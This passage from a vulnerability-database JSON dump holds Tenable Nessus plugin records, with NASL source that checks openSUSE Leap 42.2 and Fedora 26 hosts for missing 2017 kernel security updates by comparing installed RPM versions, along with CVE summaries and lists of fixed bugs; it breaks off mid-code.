"p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-docs-html", "p-cpe:/a:novell:opensuse:kernel-obs-qa", "p-cpe:/a:novell:opensuse:kernel-docs-pdf", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-obs-build", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo"], "id": "OPENSUSE-2017-1159.NASL", "href": "https://www.tenable.com/plugins/nessus/104074", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1159.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104074);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14489\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2017-1159)\");\n script_summary(english:\"Check for the openSUSE-2017-1159 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.2 Kernel was updated to 4.4.90 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\nThe following non-security bugs were fixed :\n\n - arc: Re-enable MMU upon Machine Check exception\n (bnc#1012382).\n\n - arm64: fault: Route pte translation faults via\n do_translation_fault (bnc#1012382).\n\n - arm64: Make sure SPsel is always set (bnc#1012382).\n\n - arm: pxa: add the number of DMA requestor lines\n (bnc#1012382).\n\n - arm: pxa: fix the number of DMA requestor lines\n (bnc#1012382).\n\n - bcache: correct cache_dirty_target in\n __update_writeback_rate() (bnc#1012382).\n\n - bcache: Correct return value for sysfs attach errors\n (bnc#1012382).\n\n - bcache: do not subtract sectors_to_gc for bypassed IO\n (bnc#1012382).\n\n - bcache: fix bch_hprint crash and improve output\n (bnc#1012382).\n\n - bcache: fix for gc and write-back race (bnc#1012382).\n\n - bcache: Fix leak of bdev reference (bnc#1012382).\n\n - bcache: initialize dirty stripes in flash_dev_run()\n (bnc#1012382).\n\n - blacklist.conf: Add commit b5accbb0dfae\n\n - blacklist.conf: add one more\n\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n\n - bsg-lib: do not free job in bsg_prepare_job\n (bnc#1012382).\n\n - btrfs: change how we decide to commit transactions\n during flushing (bsc#1060197).\n\n - btrfs: fix NULL pointer dereference from\n free_reloc_roots() (bnc#1012382).\n\n - btrfs: prevent to set invalid default subvolid\n (bnc#1012382).\n\n - btrfs: propagate error to btrfs_cmp_data_prepare caller\n (bnc#1012382).\n\n - btrfs: qgroup: move noisy underflow warning to debugging\n build (bsc#1055755).\n\n - cifs: Fix SMB3.1.1 guest authentication to Samba\n (bnc#1012382).\n\n - cifs: release auth_key.response for reconnect\n (bnc#1012382).\n\n - crypto: AF_ALG - remove SGL terminator indicator when\n chaining (bnc#1012382).\n\n - crypto: talitos - Do not provide setkey for non hmac\n hashing algs (bnc#1012382).\n\n - crypto: talitos - fix sha224 (bnc#1012382).\n\n - cxl: Fix driver use count (bnc#1012382).\n\n - dmaengine: mmp-pdma: add number of requestors\n (bnc#1012382).\n\n - drm: Add driver-private objects to atomic state\n (bsc#1055493).\n\n - drm/dp: Introduce MST topology state to track available\n link bandwidth (bsc#1055493).\n\n - ext4: fix incorrect quotaoff if the quota feature is\n enabled (bnc#1012382).\n\n - ext4: fix quota inconsistency during orphan cleanup for\n read-only mounts (bnc#1012382).\n\n - f2fs: check hot_data for roll-forward recovery\n (bnc#1012382).\n\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n\n - ftrace: Fix memleak when unregistering dynamic ops when\n tracing disabled (bnc#1012382).\n\n - ftrace: Fix selftest goto location on error\n (bnc#1012382).\n\n - genirq: Fix for_each_action_of_desc() macro\n (bsc#1061064).\n\n - getcwd: Close race with d_move called by lustre\n (bsc#1052593).\n\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM\n switch (bnc#1022967).\n\n - input: i8042 - add Gigabyte P57 to the keyboard reset\n table (bnc#1012382).\n\n - iommu/vt-d: Avoid calling virt_to_phys() on NULL pointer\n (bsc#1061067).\n\n - ipv6: accept 64k - 1 packet length in\n ip6_find_1stfragopt() (bnc#1012382).\n\n - ipv6: add rcu grace period before freeing fib6_node\n (bnc#1012382).\n\n - ipv6: fix memory leak with multiple tables during netns\n destruction (bnc#1012382).\n\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n\n - kabi/severities: ignore nfs_pgio_data_destroy\n\n - keys: fix writing past end of user-supplied buffer in\n keyring_read() (bnc#1012382).\n\n - keys: prevent creating a different user's keyrings\n (bnc#1012382).\n\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n\n - kvm: async_pf: Fix #DF due to inject 'Page not Present'\n and 'Page Ready' exceptions simultaneously\n (bsc#1061017).\n\n - kvm: PPC: Book3S: Fix race and leak in\n kvm_vm_ioctl_create_spapr_tce() (bnc#1012382).\n\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte()\n (bsc#1061017).\n\n - kvm: VMX: remove WARN_ON_ONCE in\n kvm_vcpu_trigger_posted_interrupt (bsc#1061017).\n\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n\n - mac80211: flush hw_roc_start work before cancelling the\n ROC (bnc#1012382).\n\n - md/bitmap: disable bitmap_resize for file-backed bitmaps\n (bsc#1061172).\n\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in\n break_stripe_batch_list (bnc#1012382).\n\n - md/raid5: release/flush io in raid5_do_work()\n (bnc#1012382).\n\n - media: uvcvideo: Prevent heap overflow when accessing\n mapped controls (bnc#1012382).\n\n - media: v4l2-compat-ioctl32: Fix timespec conversion\n (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both\n infinite inputs (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input\n values with opposite signs (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of\n both inputs zero (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN\n propagation (bnc#1012382).\n\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both\n inputs negative (bnc#1012382).\n\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity\n and zero inputs (bnc#1012382).\n\n - mm: prevent double decrease of nr_reserved_highatomic\n (bnc#1012382).\n\n - nfsd: Fix general protection fault in\n release_lock_stateid() (bnc#1012382).\n\n - pci: Allow PCI express root ports to find themselves\n (bsc#1061046).\n\n - pci: fix oops when try to find Root Port for a PCI\n device (bsc#1061046).\n\n - pci: Fix race condition with driver_override\n (bnc#1012382).\n\n - pci: shpchp: Enable bridge bus mastering if MSI is\n enabled (bnc#1012382).\n\n - perf/x86: Fix RDPMC vs. mm_struct tracking\n (bsc#1061831).\n\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs.\n mm_struct tracking' (bsc#1061831).\n\n - powerpc: Fix DAR reporting when alignment handler faults\n (bnc#1012382).\n\n - powerpc/pseries: Fix parent_dn reference leak in\n add_dt_node() (bnc#1012382).\n\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n\n - Revert 'net: fix percpu memory leaks' (bnc#1012382).\n\n - Revert 'net: phy: Correctly process PHY_HALTED in\n phy_stop_machine()' (bnc#1012382).\n\n - Revert 'net: use lib/percpu_counter API for\n fragmentation mem accounting' (bnc#1012382).\n\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure\n (bsc#1059465).\n\n - scsi: megaraid_sas: Check valid aen class range to avoid\n kernel panic (bnc#1012382).\n\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead\n (bnc#1012382).\n\n - scsi: sg: factor out sg_fill_request_table()\n (bnc#1012382).\n\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE\n (bnc#1012382).\n\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n\n - scsi: sg: use standard lists for sg_requests\n (bnc#1012382).\n\n - scsi: storvsc: fix memory leak on ring buffer busy\n (bnc#1012382).\n\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp\n ingress path (bnc#1012382).\n\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN\n response trace records (bnc#1012382).\n\n - scsi: zfcp: fix missing trace records for early returns\n in TMF eh handlers (bnc#1012382).\n\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to\n correlate with HBA (bnc#1012382).\n\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI\n trace records (bnc#1012382).\n\n - scsi: zfcp: fix queuecommand for scsi_eh commands when\n DIX enabled (bnc#1012382).\n\n - scsi: zfcp: trace HBA FSF response by default on dismiss\n or timedout late response (bnc#1012382).\n\n - scsi: zfcp: trace high part of 'new' 64 bit SCSI LUN\n (bnc#1012382).\n\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n\n - skd: Avoid that module unloading triggers a\n use-after-free (bnc#1012382).\n\n - skd: Submit requests to firmware before triggering the\n doorbell (bnc#1012382).\n\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags\n (bnc#1012382).\n\n - smb: Validate negotiate (to protect against downgrade)\n even if signing off (bnc#1012382).\n\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback\n (bnc#1012382).\n\n - timer/sysclt: Restrict timer migration sysctl values to\n 0 and 1 (bnc#1012382).\n\n - tracing: Apply trace_clock changes to instance max\n buffer (bnc#1012382).\n\n - tracing: Erase irqsoff trace with empty write\n (bnc#1012382).\n\n - tracing: Fix trace_pipe behavior for instance traces\n (bnc#1012382).\n\n - tty: fix __tty_insert_flip_char regression\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() fast path\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() slow path\n (bnc#1012382).\n\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA\n offsets (bnc#1012382).\n\n - video: fbdev: aty: do not leak uninitialized padding in\n clk to userspace (bnc#1012382).\n\n - Workaround for kABI compatibility with DP-MST patches\n (bsc#1055493).\n\n - x86/fpu: Do not let userspace set bogus xcomp_bv\n (bnc#1012382).\n\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in\n core dumps (bnc#1012382).\n\n - x86/ldt: Fix off by one in get_segment_base()\n (bsc#1061872).\n\n - xfs/dmapi: fix incorrect file->f_path.dentry->d_inode\n usage (bsc#1055896).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1052593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055493\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061872\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-base-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-base-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-debugsource-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-devel-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-devel-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-base-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-base-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-debugsource-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-devel-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-devel-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-docs-html-4.4.90-18.32.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-docs-pdf-4.4.90-18.32.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-macros-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-build-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-build-debugsource-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-qa-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-source-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-source-vanilla-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-syms-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-base-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-base-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-debugsource-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-devel-4.4.90-18.32.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-docs-html / kernel-docs-pdf / kernel-devel / kernel-macros / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T10:11:35", "description": "The 4.12.13 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 8.8, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-18T00:00:00", "title": "Fedora 26 : kernel (2017-7369ea045c) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2017-09-18T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-7369EA045C.NASL", "href": "https://www.tenable.com/plugins/nessus/103264", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-7369ea045c.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103264);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n script_xref(name:\"FEDORA\", value:\"2017-7369ea045c\");\n\n script_name(english:\"Fedora 26 : kernel (2017-7369ea045c) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.12.13 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-7369ea045c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n if 